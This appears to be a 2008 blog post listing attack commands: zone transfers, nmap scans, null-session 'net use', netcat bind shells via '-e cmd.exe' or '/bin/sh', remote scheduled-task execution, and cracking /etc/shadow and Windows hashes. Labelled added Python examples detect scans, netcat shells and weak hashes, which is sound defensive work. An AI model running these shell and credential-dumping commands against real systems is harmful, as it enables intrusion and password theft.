Saturday, July 5, 2008

Hacking Cheat Sheet

####################
#  Reconnaissance  #
####################
---------------------
- DNS Zone Transfer -
---------------------
Windows: nslookup (interactive mode; type the next two lines at the nslookup prompt)
server [DNS SERVER]
ls -d [domain.net]

UNIX: dig @[DNS SERVER] [domain.net] -t AXFR


####################
# Scanning #
####################
--------
- NMAP -
--------
# nmap -sS -sV -O -PI [IP Address/Range]

-sS (SYN Stealth Scan)
-sV (Version Probe)
-O (OS Detection)
-PI (ICMP Echo ping to check whether the host is alive)
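
The defender's view of the scan above: a SYN scan sends one SYN to many ports on a host from a single source in a short time. The script below is an added example, not part of the cheat sheet, that flags that pattern in constructed iptables-style kernel log lines. The log lines, hostnames and addresses are made up; the threshold and window are assumptions to tune for your own network.

```python
"""Port-scan detection over constructed firewall log lines (added example).

A SYN scan (nmap -sS) reaches many (host, port) pairs from one source within
seconds. detect_scanners() flags any source that hits at least PORT_THRESHOLD
distinct (host, port) pairs inside a sliding WINDOW_SECONDS window.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

LOG_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+) .*?SYN"
)


def _line(sec, src, dst, dpt):
    # Builds one constructed iptables LOG line; the year is supplied at parse time.
    return (f"Jul 05 10:00:{sec:02d} fw kernel: IN=eth0 OUT= SRC={src} DST={dst} "
            f"PROTO=TCP SPT=40123 DPT={dpt} WINDOW=1024 SYN URGP=0")


# Constructed sample: 10.0.0.5 probes ports 21..32 on 10.0.0.10 within 12 seconds,
# while 10.0.0.7 makes a few ordinary connections to ports 80 and 443.
SAMPLE_LOG = "\n".join(
    [_line(i, "10.0.0.5", "10.0.0.10", 21 + i) for i in range(12)]
    + [_line(3, "10.0.0.7", "10.0.0.10", 80),
       _line(9, "10.0.0.7", "10.0.0.10", 443),
       _line(30, "10.0.0.7", "10.0.0.10", 80)]
)


def parse_syn_events(log_text, year=2008):
    """Return {src: [(timestamp, dst, dport), ...]} for TCP SYN lines in the log."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue  # not a TCP SYN line in the format we understand
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
        events[m.group("src")].append((ts, m.group("dst"), int(m.group("dpt"))))
    return events


def detect_scanners(log_text, port_threshold=10, window_seconds=60):
    """Return {src: largest number of distinct (dst, port) targets seen in one
    window} for every source that reaches port_threshold or more."""
    alerts = {}
    window = timedelta(seconds=window_seconds)
    for src, evs in parse_syn_events(log_text).items():
        evs.sort()
        in_window = defaultdict(int)  # (dst, dport) -> hits currently inside the window
        start = 0
        for ts, dst, dport in evs:
            in_window[(dst, dport)] += 1
            # Expire events that are older than the window.
            while evs[start][0] < ts - window:
                _, old_dst, old_dport = evs[start]
                in_window[(old_dst, old_dport)] -= 1
                if in_window[(old_dst, old_dport)] == 0:
                    del in_window[(old_dst, old_dport)]
                start += 1
            if len(in_window) >= port_threshold:
                alerts[src] = max(alerts.get(src, 0), len(in_window))
    return alerts


if __name__ == "__main__":
    for src, n in detect_scanners(SAMPLE_LOG).items():
        print(f"possible SYN scan from {src}: {n} distinct targets within 60s")
```

Only SYN lines count, so a host that completes normal connections to a couple of services never accumulates enough distinct targets; lower the window or threshold to catch slower scans, at the cost of more noise.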

-----------------
- Windows - Net -
-----------------
> net use \\hostname "" /U:""
> net use
> net sessions
> net view \\hostname
> net use * /del
> net time \\hostname
> net use * \\hostname\c$ [password] /u:[domain\userid]


####################
#    Exploiting    #
####################
----------
- NetCat -
----------

> nc -l -p [PORT NO]
> nc [HOST IP] [PORT NO]
> nc -l -p [PORT NO] -e cmd.exe   (Windows; on UNIX use -e /bin/sh)
> nc -l -p [SOURCE PORT NO] 0backpipe (create backpipe with 'mknod backpipe p')
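
To spot the listener-with-shell pattern from the NetCat section on your own hosts, an added example (not part of the cheat sheet) that runs over constructed process command-line records. In practice the records would come from an execve audit trail or an endpoint process feed; the hostnames and command lines here are made up, and the list of binary names and exec options is an assumption covering the common netcat builds.

```python
"""Flag netcat listeners that hand out a shell (added example).

A netcat-family binary started with an option that executes a program (-e, -c,
--exec, --sh-exec) is the pattern to alert on. Plain port checks (nc -zv host 25)
are not flagged.
"""
import os

NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd", "nc.exe", "ncat.exe"}
EXEC_OPTIONS = {"-e", "-c", "--exec", "--sh-exec"}

# Constructed sample records: (hostname, command line). None of these are real hosts.
SAMPLE_PROCESSES = [
    ("web01", "nc -l -p 4444 -e /bin/sh"),
    ("win07", "C:\\tools\\nc.exe -l -p 4444 -e cmd.exe"),
    ("build02", "ncat --exec /bin/bash -l 5555"),
    ("mail01", "nc -zv mail.example.com 25"),            # connectivity check, no exec
    ("db01", "/usr/bin/nc.traditional -c /bin/sh -l -p 9"),
    ("web02", "bash -c 'ls -l /tmp'"),                    # not netcat at all
]


def _tokens(cmdline):
    """Split a command line on whitespace and strip surrounding quotes."""
    return [t.strip("'\"") for t in cmdline.split()]


def is_netcat_shell(cmdline):
    """Return the offending option when the command is netcat with an exec option, else None."""
    toks = _tokens(cmdline)
    if not toks:
        return None
    # Normalise Windows paths so basename() works on both platforms.
    binary = os.path.basename(toks[0].replace("\\", "/")).lower()
    if binary not in NETCAT_NAMES:
        return None
    for tok in toks[1:]:
        opt = tok.split("=", 1)[0]  # also catches --exec=/bin/sh
        if opt in EXEC_OPTIONS:
            return opt
    return None


def find_netcat_shells(records):
    """Return [(host, cmdline, option)] for every record that looks like a netcat shell."""
    hits = []
    for host, cmdline in records:
        opt = is_netcat_shell(cmdline)
        if opt:
            hits.append((host, cmdline, opt))
    return hits


if __name__ == "__main__":
    for host, cmdline, opt in find_netcat_shells(SAMPLE_PROCESSES):
        print(f"{host}: netcat with {opt}: {cmdline}")
```

The check is deliberately a simple token match; a renamed binary or a shell spawned through a different tool will not match it, so treat it as one signal among several rather than a complete detector.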

----------------------
- Windows SC command -
----------------------
> net start (lists all running services)
> sc \\hostname start schedule
> sc \\hostname start [service name]
> at \\hostname [time in A/P format] [run command]
> (VISTA ONLY!) schtasks /create /s [target IP] /ru "system" /sc once /st 20:45:00 /sd mm/dd/yyyy /tn [program name] /tr [full path with program name]

-----------------------
- Password Crack UNIX -
-----------------------
# unshadow /etc/passwd /etc/shadow > /tmp/combined
# john /tmp/combined
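
unshadow and john work on whatever sits in the second field of /etc/shadow, so the defensive check is which hash scheme each account uses and whether any account has no password at all. The audit below is an added example, not part of the cheat sheet; the shadow entries are constructed and the hash strings are not real hashes. The prefix table is an assumption covering the crypt schemes common on Linux and BSD.

```python
"""Audit shadow-format entries for hashes an offline cracker handles quickly (added example).

Categories: empty (no password), locked (! or *), strong (SHA-512, SHA-256,
yescrypt, scrypt, bcrypt), md5 ($1$), des (13-character traditional crypt), unknown.
"""

# Prefixes of the modern crypt schemes; everything else is treated as legacy.
STRONG_PREFIXES = ("$6$", "$5$", "$y$", "$7$", "$2a$", "$2b$", "$2y$")

# Constructed sample; the hash strings are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$6$saltsalt$NOTAREALHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:17718:0:99999:7:::
alice:$y$j9T$NOTAREALHASHyyyyyyyyyyyy$zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:17718:0:99999:7:::
bob:$1$abcdefgh$NOTAREALHASHmmmmmmmmmm:17718:0:99999:7:::
carol:abJnggxhB/yWI:17718:0:99999:7:::
dave::17718:0:99999:7:::
backup:*:17718:0:99999:7:::
svc:!:17718:0:99999:7:::
"""


def classify_hash(field):
    """Map a shadow password field to one of: empty, locked, strong, md5, des, unknown."""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    if field.startswith(STRONG_PREFIXES):
        return "strong"
    if field.startswith("$1$"):
        return "md5"
    if len(field) == 13 and "$" not in field:
        return "des"
    return "unknown"


def audit_shadow(text):
    """Return {user: category} for each entry in shadow-format text."""
    result = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue  # malformed line, skip it
        result[fields[0]] = classify_hash(fields[1])
    return result


def weak_accounts(text):
    """Accounts that need attention: no password, or a legacy MD5/DES hash."""
    return sorted(u for u, cat in audit_shadow(text).items() if cat in ("empty", "md5", "des"))


if __name__ == "__main__":
    for user, cat in audit_shadow(SAMPLE_SHADOW).items():
        print(f"{user}: {cat}")
    print("needs attention:", ", ".join(weak_accounts(SAMPLE_SHADOW)))
```

Run it as root against a copy of the real file (for example `audit_shadow(open("/etc/shadow").read())`) and follow up on anything in the empty, md5 or des categories; forcing a password change moves the account to the system's current default scheme.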

--------------------------
- Password Crack WINDOWS -
--------------------------
# use pwdump3 or fgdump
# crack with John the Ripper or Cain & Abel
